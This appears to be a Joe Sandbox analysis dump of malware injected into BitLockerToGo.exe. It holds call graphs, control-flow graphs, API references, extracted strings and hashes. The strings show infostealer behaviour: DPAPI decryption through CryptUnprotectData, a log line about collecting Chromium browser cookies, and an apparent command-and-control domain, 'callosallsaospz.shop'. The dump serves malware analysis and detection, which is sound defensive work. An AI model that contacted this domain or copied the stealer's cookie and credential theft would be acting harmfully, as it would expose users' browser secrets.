13520->13485 13521->13506 13522->13514 13523->13511 13524->13517 13238 2ec72dd 13239 2ec72e2 13238->13239 13244 2ec737e 13239->13244 13246 2ee9d10 LdrInitializeThunk 13239->13246 13241 2ec7459 13247 2eb2f30 13241->13247 13243 2ec7541 13244->13241 13244->13243 13245 2eec560 LdrInitializeThunk 13244->13245 13245->13244 13246->13244 13248 2eb3047 13247->13248 13249 2eb2f3e 13247->13249 13250 2eb300e 13249->13250 13252 2eb2f53 13249->13252 13256 2eb2fbd 13249->13256 13253 2eb2f30 RtlFreeHeap 13250->13253 13250->13256 13251 2eb2f93 13260 2ee7f42 13251->13260 13252->13248 13252->13251 13255 2eb2f30 RtlFreeHeap 13252->13255 13253->13250 13255->13252 13257 2ee7f42 RtlFreeHeap 13256->13257 13257->13248 13258 2ee7f42 RtlFreeHeap 13258->13256 13261 2ee7f50 13260->13261 13262 2ee7fdc RtlFreeHeap 13260->13262 13263 2eb2fb1 13260->13263 13261->13262 13262->13263 13263->13258 13525 2ec249d 13528 2ec24b0 13525->13528 13529 2ec269a 13528->13529 13530 2ec6cb0 13528->13530 13539 2eba4f0 13528->13539 13529->13529 13531 2ec6cd0 13530->13531 13531->13531 13532 2eec380 LdrInitializeThunk 13531->13532 13535 2ec6e98 13532->13535 13533 2ec6ef1 13543 2ee9d10 LdrInitializeThunk 13533->13543 13534 2eec740 LdrInitializeThunk 13534->13535 13535->13533 13535->13534 13536 2eec850 LdrInitializeThunk 13535->13536 13536->13535 13538 2ec7979 13540 2eba505 13539->13540 13542 2eba541 13539->13542 13541 2ee3cd0 3 API calls 13540->13541 13541->13542 13542->13528 13543->13538 13544 2ec1f98 13549 2ec1f9e 13544->13549 13545 2ec2385 13546 2ec97b0 LdrInitializeThunk 13547 2ec23e3 13546->13547 13548 2eba4f0 3 API calls 13547->13548 13548->13545 13549->13545 13549->13546 13264 2eca859 13265 2eca85e 13264->13265 13266 2ec6840 LdrInitializeThunk 13265->13266 13267 2eca87d 13266->13267 13268 2ee9ed7 13270 2ee9e10 13268->13270 13269 2ee9f56 13270->13268 13270->13269 13272 2ee9d10 LdrInitializeThunk 13270->13272 13272->13270 13550 2ec7a10 13551 2ec7a20 13550->13551 13552 2ec7bb6 CryptUnprotectData 13551->13552 13553 2ec7bdd 13552->13553 13554 2ed2290 13557 2ed22d0 13554->13557 13555 2ed233e 13556 2ee7e80 RtlAllocateHeap 13555->13556 13561 2ed241e 13555->13561 13559 2ed2378 13556->13559 13557->13555 13562 2ee9d10 LdrInitializeThunk 13557->13562 13559->13561 13563 2ee9d10 LdrInitializeThunk 13559->13563 13562->13555 13563->13561 13277 2ed1b52 13278 2ed1b7b 13277->13278 13279 2ed1bdc 13277->13279 13280 2ed1b5c 13277->13280 13285 2ed1bf7 13277->13285 13287 2ed1b90 13277->13287 13288 2ed1b8a 13277->13288 13278->13279 13281 2ee9c20 2 API calls 13278->13281 13278->13285 13278->13287 13278->13288 13292 2ee9c20 13279->13292 13314 2eed010 13280->13314 13281->13279 13283 2eecc00 LdrInitializeThunk 13283->13285 13285->13283 13285->13287 13285->13288 13298 2eecd40 13285->13298 13306 2eed680 13285->13306 13322 2ee9d10 LdrInitializeThunk 13285->13322 13288->13287 13323 2ee9d10 LdrInitializeThunk 13288->13323 13293 2ee9c3f 13292->13293 13294 2ee9ce7 13292->13294 13295 2ee9cd2 RtlReAllocateHeap 13292->13295 13296 2ee9ce1 13292->13296 13293->13294 13293->13295 13294->13285 13295->13294 13297 2ee7e80 RtlAllocateHeap 13296->13297 13297->13294 13301 2eecd70 13298->13301 13299 2eecdde 13300 2ee7e80 RtlAllocateHeap 13299->13300 13305 2eecece 13299->13305 13303 2eece21 13300->13303 13301->13299 13324 2ee9d10 LdrInitializeThunk 13301->13324 13303->13305 13325 2ee9d10 LdrInitializeThunk 13303->13325 13305->13285 13308 2eed6a0 13306->13308 13307 2eed75e 13309 2ee7e80 RtlAllocateHeap 13307->13309 13313 2eed852 13307->13313 13308->13307 13326 2ee9d10 LdrInitializeThunk 13308->13326 13311 2eed7a3 13309->13311 13311->13313 13327 2ee9d10 LdrInitializeThunk 13311->13327 13313->13285 13316 2eed042 13314->13316 13315 2eed0be 13317 2ee7e80 RtlAllocateHeap 13315->13317 13321 2eed1ae 13315->13321 13316->13315 13328 2ee9d10 LdrInitializeThunk 13316->13328 13319 2eed0fe 13317->13319 13319->13321 13329 2ee9d10 LdrInitializeThunk 13319->13329 13321->13278 13321->13321 13322->13285 13323->13287 13324->13299 13325->13305 13326->13307 13327->13313 13328->13315 13329->13321 13564 2ed1212 13568 2ed122b 13564->13568 13569 2ed1180 13564->13569 13565 2eecc00 LdrInitializeThunk 13565->13569 13566 2ed152f 13571 2eed010 2 API calls 13566->13571 13567 2ed154e 13570 2eed010 2 API calls 13567->13570 13569->13564 13569->13565 13569->13566 13569->13567 13569->13568 13572 2eecd40 2 API calls 13569->13572 13573 2ed1570 13570->13573 13571->13567 13572->13569

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 215 2ed9c80-2ed9d4d 216 2ed9d54-2eda341 215->216
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: L$O$R$S$T$V$Y$\$]$_$`$b$c$d$f$g$j$l$n$o$q$r$t$u$x$z$|$}
                                                                                      • API String ID: 0-417411623
                                                                                      • Opcode ID: d90129b1b92f3056f1a816dae3a51f61e21c1dc45a5e5ed7d216337773360f73
                                                                                      • Instruction ID: f4773c7bb0619d1195fc208668d6d16e6976ffb617d479b2211e15505550f057
                                                                                      • Opcode Fuzzy Hash: d90129b1b92f3056f1a816dae3a51f61e21c1dc45a5e5ed7d216337773360f73
                                                                                      • Instruction Fuzzy Hash: 1DE165F424A3808BD3B18F05D66979FBBE4BBD1349F90A98C928C1B245C7B54148CF86
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: %05+$/.)($1=#:$2PBd$9'> $IT$M@K7$V^QU$\^$oQ`_$zFDN$Mw$=
                                                                                      • API String ID: 0-2380173426
                                                                                      • Opcode ID: 6ebded85da19934334404105ca63650e7e835da8e1f47edb3c5d20391b792a60
                                                                                      • Instruction ID: 3ef7f6e290a60c43b051fed5fc23f9d45220183ad0c5715543c2603d79abe129
                                                                                      • Opcode Fuzzy Hash: 6ebded85da19934334404105ca63650e7e835da8e1f47edb3c5d20391b792a60
                                                                                      • Instruction Fuzzy Hash: 7343AE70144B818BE335CF39C4947A3FBE2AF56308F589A6DC4EB4B692D735A44ACB50

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd
                                                                                      Similarity
                                                                                      • API ID: Object$DeleteSelect$CallbackDispatcherMetricsSystemUser
                                                                                      • String ID:
                                                                                      • API String ID: 1449868515-3916222277
                                                                                      • Opcode ID: 9e7bc82f0d899c085d02696e79c5935ef88da8f661dcf4c22682adc077bdc2a4
                                                                                      • Instruction ID: 17456cce908150e44eeff01b533f98412d9fa1f64141b21492283b6cbd9534ba
                                                                                      • Opcode Fuzzy Hash: 9e7bc82f0d899c085d02696e79c5935ef88da8f661dcf4c22682adc077bdc2a4
                                                                                      • Instruction Fuzzy Hash: F1915BB4605B008FD3A4EF29D585A16BBF1FB89700B508A6DE89AC7B54D730B854CF92

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 771 2ec7deb-2ec7e2a 772 2ec7e2c-2ec7e2f 771->772 773 2ec7e76-2ec7ee7 call 2ec6840 771->773 774 2ec7e30-2ec7e74 772->774 777 2ec7ee9 773->777 778 2ec7f33-2ec7fc9 call 2ec6840 773->778 774->773 774->774 779 2ec7ef0-2ec7f31 777->779 782 2ec8019-2ec808b call 2ec6840 778->782 783 2ec7fcb 778->783 779->778 779->779 787 2ec80dc-2ec8160 call 2ec6840 782->787 788 2ec808d-2ec808f 782->788 784 2ec7fd0-2ec8017 783->784 784->782 784->784 792 2ec81d6-2ec820b 787->792 793 2ec8162 787->793 789 2ec8090-2ec80da 788->789 789->787 789->789 795 2ec8210-2ec8219 792->795 794 2ec8170-2ec81d4 793->794 794->792 794->794 795->795 796 2ec821b-2ec821e 795->796 797 2ec8224-2ec8229 796->797 798 2ec8ae5 796->798 799 2ec8ae8-2ec8af9 call 2eb93a0 797->799 798->799 802 2ec8afb-2ec8afe 799->802 803 2ec8b11-2ec8b24 799->803 804 2ec8b00-2ec8b0f 802->804 805 2ec8b26-2ec8b2f 803->805 806 2ec8b43 803->806 804->803 804->804 808 2ec8b30-2ec8b3f 805->808 807 2ec8b46-2ec8b4d 806->807 809 2ec8b62-2ec8b7b call 2ee3fb0 call 2ec6840 807->809 808->808 810 2ec8b41 808->810 814 2ec8b80-2ec8b86 809->814 810->807 814->809 815 2ec8b8d-2ec8b92 814->815 816 2ec8d1e-2ec8dc7 814->816 817 2ec8b99-2ec8b9d 814->817 818 2ec8ba4-2ec8bbc 814->818 819 2ec8bc6-2ec8bd9 call 2eb93b0 814->819 820 2ec8ea6-2ec8eb0 814->820 821 2ec8eb7 814->821 822 2ec8b50-2ec8b5b 814->822 823 2ec8be0-2ec8c65 814->823 815->809 815->816 815->817 815->818 815->819 815->820 815->821 815->823 826 2ec8dcd-2ec8dcf 816->826 827 2ec8e4b 816->827 817->816 817->818 817->819 817->820 817->821 817->823 818->819 819->821 819->823 820->821 820->823 831 2ec8ec1 821->831 822->809 822->816 822->817 822->818 822->819 822->820 822->821 822->823 824 2ec8c67 823->824 825 2ec8cc2-2ec8cf4 823->825 829 2ec8c70-2ec8cc0 824->829 830 2ec8d00-2ec8d09 825->830 832 2ec8dd0-2ec8e49 826->832 833 2ec8e50-2ec8e56 827->833 829->825 829->829 830->830 835 2ec8d0b-2ec8d0e 830->835 836 2ec8ec4-2ec8ed6 call 2eb93a0 831->836 832->827 832->832 833->833 837 2ec8e58-2ec8e67 833->837 835->831 838 2ec8d14-2ec8d19 835->838 844 2ec8ed8-2ec8edf 836->844 845 2ec8ef1-2ec8f01 836->845 840 2ec8e69-2ec8e6f 837->840 841 2ec8e81-2ec8e9c 837->841 838->836 843 2ec8e70-2ec8e7b 840->843 841->820 843->843 846 2ec8e7d-2ec8e7f 843->846 847 2ec8ee0-2ec8eef 844->847 848 2ec8f21-2ec8f77 845->848 849 2ec8f03-2ec8f0a 845->849 846->841 847->845 847->847 851 2ec8f79 848->851 852 2ec8fcb-2ec8fff 848->852 850 2ec8f10-2ec8f1f 849->850 850->848 850->850 854 2ec8f80-2ec8fc9 851->854 853 2ec9000-2ec9009 852->853 853->853 855 2ec900b-2ec9015 853->855 854->852 854->854 856 2ec9020-2ec9029 855->856 856->856 857 2ec902b-2ec903c 856->857 858 2ec903e-2ec9043 857->858 859 2ec9045-2ec904a 857->859 860 2ec904d-2ec905e call 2eb93a0 858->860 859->860 863 2ec9060-2ec9065 860->863 864 2ec9081-2ec908f 860->864 865 2ec9070-2ec907f 863->865 866 2ec9091-2ec9097 864->866 867 2ec90b3 864->867 865->864 865->865 869 2ec90a0-2ec90af 866->869 868 2ec90b6-2ec90c6 867->868 870 2ec90c8-2ec90cf 868->870 871 2ec90e1-2ec910d 868->871 869->869 872 2ec90b1 869->872 873 2ec90d0-2ec90df 870->873 874 2ec914f-2ec9177 call 2ecbd30 871->874 875 2ec910f 871->875 872->868 873->871 873->873 876 2ec9110-2ec914d 875->876 876->874 876->876
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: -]%$?M33$GAF>$O0+X$S=W?$[info] collected cookies file of the chromium-based browser[info] collected cookies file of the chromium-based browser$pq$/+W$Q"&
                                                                                      • API String ID: 0-1662856041
                                                                                      • Opcode ID: e7f50dac03e081bac2d7f3910374b0d6070c2473336940365676b47741118f08
                                                                                      • Instruction ID: 027374a1facb40d05d4ac88c1900edf22c20723ea68295f0e58d7ff09f81a1a7
                                                                                      • Opcode Fuzzy Hash: e7f50dac03e081bac2d7f3910374b0d6070c2473336940365676b47741118f08
                                                                                      • Instruction Fuzzy Hash: BE5277B19483808BC324CF24C59176BBBF2FFC5358F249A1DE8D99B291D7349946CB86

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1231 2ebfcb0-2ebfcfd 1232 2ebfcff 1231->1232 1233 2ebfd54-2ebfdd2 1231->1233 1234 2ebfd00-2ebfd52 1232->1234 1235 2ebfe38-2ebfe49 1233->1235 1236 2ebfdd4 1233->1236 1234->1233 1234->1234 1238 2ebfe6b-2ebfe73 1235->1238 1239 2ebfe4b-2ebfe52 1235->1239 1237 2ebfde0-2ebfe36 1236->1237 1237->1235 1237->1237 1241 2ebfe8b-2ebfe98 1238->1241 1242 2ebfe75-2ebfe76 1238->1242 1240 2ebfe60-2ebfe69 1239->1240 1240->1238 1240->1240 1244 2ebfebb-2ebfec3 1241->1244 1245 2ebfe9a-2ebfea1 1241->1245 1243 2ebfe80-2ebfe89 1242->1243 1243->1241 1243->1243 1247 2ebfedb-2ec001a 1244->1247 1248 2ebfec5-2ebfec6 1244->1248 1246 2ebfeb0-2ebfeb9 1245->1246 1246->1244 1246->1246 1250 2ec001c-2ec001f 1247->1250 1251 2ec007e-2ec00ca 1247->1251 1249 2ebfed0-2ebfed9 1248->1249 1249->1247 1249->1249 1252 2ec0020-2ec007c 1250->1252 1253 2ec00cc-2ec00cf 1251->1253 1254 2ec0126-2ec014d call 2ebc960 1251->1254 1252->1251 1252->1252 1256 2ec00d0-2ec0124 1253->1256 1257 2ec0152-2ec0158 1254->1257 1256->1254 1256->1256 1258 2ec02ed-2ec112d 1257->1258 1259 2ec015f-2ec0168 1257->1259 1260 2ec016f-2ec0197 GetSystemDirectoryW 1257->1260 1261 2ec01e7 1257->1261 1259->1258 1259->1260 1259->1261 1263 2ec019e-2ec01a2 1260->1263 1264 2ec0199-2ec019c 1260->1264 1261->1258 1265 2ec01a5-2ec01ad 1263->1265 1264->1263 1264->1265 1266 2ec01af-2ec01b2 1265->1266 1267 2ec01b4 1265->1267 1266->1267 1268 2ec01b5-2ec01e0 call 2eb93a0 call 2ee42d0 call 2ee7f10 1266->1268 1267->1268 1268->1258 1268->1261
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: callosallsaospz.shop$pedc$tu
                                                                                      • API String ID: 0-2702032971
                                                                                      • Opcode ID: 95cca4f18d538cbbe99a80118211c83ed38eab478ade942ebff5ef6a7d5dd5e1
                                                                                      • Instruction ID: 0cb54b4fac9474ef0702c38617c30fb40ee638b4f4eb4a56f09353dce525d6f4
                                                                                      • Opcode Fuzzy Hash: 95cca4f18d538cbbe99a80118211c83ed38eab478ade942ebff5ef6a7d5dd5e1
                                                                                      • Instruction Fuzzy Hash: D8C198B44493D18BD371CF25C484B9FBBE1AFC6308F549A5DE4C81B252C7316949CBA6
                                                                                      APIs
                                                                                      • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 02EE3E10
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd
                                                                                      Similarity
                                                                                      • API ID: InformationVolume
                                                                                      • String ID: /.)(
                                                                                      • API String ID: 2039140958-2587180175
                                                                                      • Opcode ID: 94259d3bd49d1d04e183cdc5bef6fc5f91e0cc7e05186c85a98055077a1bd0e1
                                                                                      • Instruction ID: ddc9e2b6aa8fdbb09ba0b7c91f9c548eb71b2f4296a0530f69eee9e94d8c16ad
                                                                                      • Opcode Fuzzy Hash: 94259d3bd49d1d04e183cdc5bef6fc5f91e0cc7e05186c85a98055077a1bd0e1
                                                                                      • Instruction Fuzzy Hash: CC02BF71690B008FDB24CF29D891B26B7F6FB89304F548A6DE5978BB91D730E841CB90
                                                                                      APIs
                                                                                      • CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 02EC7BCD
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd
                                                                                      Similarity
                                                                                      • API ID: CryptDataUnprotect
                                                                                      • String ID: %$'
                                                                                      • API String ID: 834300711-1094439344
                                                                                      • Opcode ID: 1f5adba189e331c3fdee092ab79cb603ecc6f04cc3c97dd42b9494696651a569
                                                                                      • Instruction ID: bb2f002d6590c4a57b36e77c09de657ceb9d8d7663811c1214362cf30773b05e
                                                                                      • Opcode Fuzzy Hash: 1f5adba189e331c3fdee092ab79cb603ecc6f04cc3c97dd42b9494696651a569
                                                                                      • Instruction Fuzzy Hash: 7DA19AB14483818FC714CF68C890A6BF7E2BF85318F148A5DE4968B391E375D956CF82
                                                                                      APIs
                                                                                      • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 02EE7F04
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocateHeap
                                                                                      • String ID: f543
                                                                                      • API String ID: 1279760036-424919641
                                                                                      • Opcode ID: 64f5eb00e60473e25decf7751701070b182dca105e535054652df9d09a1c5df2
                                                                                      • Instruction ID: ebe23475a34c89832c66b71b9234433fc6134086e21f89e1f298e950c7dd5d61
                                                                                      • Opcode Fuzzy Hash: 64f5eb00e60473e25decf7751701070b182dca105e535054652df9d09a1c5df2
                                                                                      • Instruction Fuzzy Hash: E001AD305083409BC708EF18C4A0B2AFBF5EF86318F108A1CE5D907690C731AD24CB86
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: L$Z
                                                                                      • API String ID: 0-4237817082
                                                                                      • Opcode ID: 0fd853a44aaabd5461eee6c7e64f17836d4ce42116697c550878065ac7198c73
                                                                                      • Instruction ID: d86363778969d2ceffc2b41c13e63b281c3ad0737f899144b933651c0dea473a
                                                                                      • Opcode Fuzzy Hash: 0fd853a44aaabd5461eee6c7e64f17836d4ce42116697c550878065ac7198c73
                                                                                      • Instruction Fuzzy Hash: 5002DDB19483408BD715DF28C840A6BB7E6FF89308F149A2DE9C987351E739D916CF92
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Z-K/$\1N3
                                                                                      • API String ID: 0-2464779077
                                                                                      • Opcode ID: c6b7481d0b887f9440a07e3e62ed9191a3080d53193984f333bdad8afb0e8644
                                                                                      • Instruction ID: b51b5bb6d35419ff361efcee067620a39f6ed0b217bb3ec542f036e3a7b2f7be
                                                                                      • Opcode Fuzzy Hash: c6b7481d0b887f9440a07e3e62ed9191a3080d53193984f333bdad8afb0e8644
                                                                                      • Instruction Fuzzy Hash: 7F81E171A883409FD764CF14C890B6BB3B6FFC9318F549A1CF9A95B281D7709905CB92
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Z
                                                                                      • API String ID: 0-1505515367
                                                                                      • Opcode ID: 148eb6199354f63ccc81127b538e6b9c317286ca33ffbd917ddd1eb5bd288588
                                                                                      • Instruction ID: 3dd7332a786f0a8e56f67976ec8849c2017c8b3050296299fab1be12ede0f802
                                                                                      • Opcode Fuzzy Hash: 148eb6199354f63ccc81127b538e6b9c317286ca33ffbd917ddd1eb5bd288588
                                                                                      • Instruction Fuzzy Hash: 0FE1BAB29483408BD715CF68C85066BB7E6FF89308F149A6DE9C587350E738D916CF92
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 21
                                                                                      • API String ID: 0-4252452532
                                                                                      • Opcode ID: 21a3b6dc0004107fa80922ad1db4cedfc9fad71c1bb461ae58a74e6a191cfdad
                                                                                      • Instruction ID: 182bc5403af7bf7729b9ad416efd76e1d6ca98006e2620e023649ca27a4e494a
                                                                                      • Opcode Fuzzy Hash: 21a3b6dc0004107fa80922ad1db4cedfc9fad71c1bb461ae58a74e6a191cfdad
                                                                                      • Instruction Fuzzy Hash: 5CC1A9B15483118BC718CF58C89176BB7F1FF86358F149A1CE8964B392E7B4D906CB92
                                                                                      APIs
                                                                                      • RtlReAllocateHeap.NTDLL(?,00000000,00000000), ref: 02EE9CD9
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocateHeap
                                                                                      • String ID:
                                                                                      • API String ID: 1279760036-0
                                                                                      • Opcode ID: 0b321a0ed9aaf7264e3f340f10ce9aba7a5e499c25db0bd491aed4dd6c06af40
                                                                                      • Instruction ID: aa178d6f755b5800b736f5fd5921dddd1c92be751c0456450c6d3c5afa85854a
                                                                                      • Opcode Fuzzy Hash: 0b321a0ed9aaf7264e3f340f10ce9aba7a5e499c25db0bd491aed4dd6c06af40
                                                                                      • Instruction Fuzzy Hash: 6921FD71949201DBD700AF2AD844BABBBEAEFC5314F04C928E9D917295D731E850CBC2
                                                                                      APIs
                                                                                      • LdrInitializeThunk.NTDLL(02EEC710,005C003F,00000002,00000018,?), ref: 02EE9D36
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 3af67e3b8a4cf002b2d8122619789f5e408d063de0ae60c6913db66b84c766ee
                                                                                      • Instruction ID: 9a2a3e30e6272c7ba4599b7d5b49d8b1df743313db24dc7d28a19b0c9381744b
                                                                                      • Opcode Fuzzy Hash: 3af67e3b8a4cf002b2d8122619789f5e408d063de0ae60c6913db66b84c766ee
                                                                                      • Instruction Fuzzy Hash: 82D04875908216AB9A09CF44C54040EFBE6BFC4714F228C8EA88873214C3B0BD46EB82
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: /.)(
                                                                                      • API String ID: 0-2587180175
                                                                                      • Opcode ID: 207924ac385353aff347f3af37a001f81b1e62ff4fa945a16df4536e3a9adc4e
                                                                                      • Instruction ID: fe1aaa0ede302cd564042c2cf5019f4902e89b2f742b1115303edf00d61aefa9
                                                                                      • Opcode Fuzzy Hash: 207924ac385353aff347f3af37a001f81b1e62ff4fa945a16df4536e3a9adc4e
                                                                                      • Instruction Fuzzy Hash: 64A17874681B41CFDB24CF1AD5A0722B7F2EB89308F58D96CD5A78BB56C334A855CB80
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e4cb6ca75af563d59e382566aa964881376af0bf0278eb48fd2634a1082d9b09
                                                                                      • Instruction ID: 2fc9cd0a639b1a578898933492ebc34ebcb45f702fa7c51a00802197a30562d3
                                                                                      • Opcode Fuzzy Hash: e4cb6ca75af563d59e382566aa964881376af0bf0278eb48fd2634a1082d9b09
                                                                                      • Instruction Fuzzy Hash: 4451B1B0884B05DFD7018F2AE80975BBBA0FF8031CF044978E55E96A50D735E9B4CB96
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d279e27be20da3a684a6cd3b8a2e5bdece897f10d841426908e877044c6dd109
                                                                                      • Instruction ID: 9f2ba09c21eb969eafa6745151db24569aa8e4a5d88d04b657ac1220c17f1287
                                                                                      • Opcode Fuzzy Hash: d279e27be20da3a684a6cd3b8a2e5bdece897f10d841426908e877044c6dd109
                                                                                      • Instruction Fuzzy Hash: 0941A271A806408FD7669F65D980B6773E6AF8A304F58E82CEA4683740E731F452CB41

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
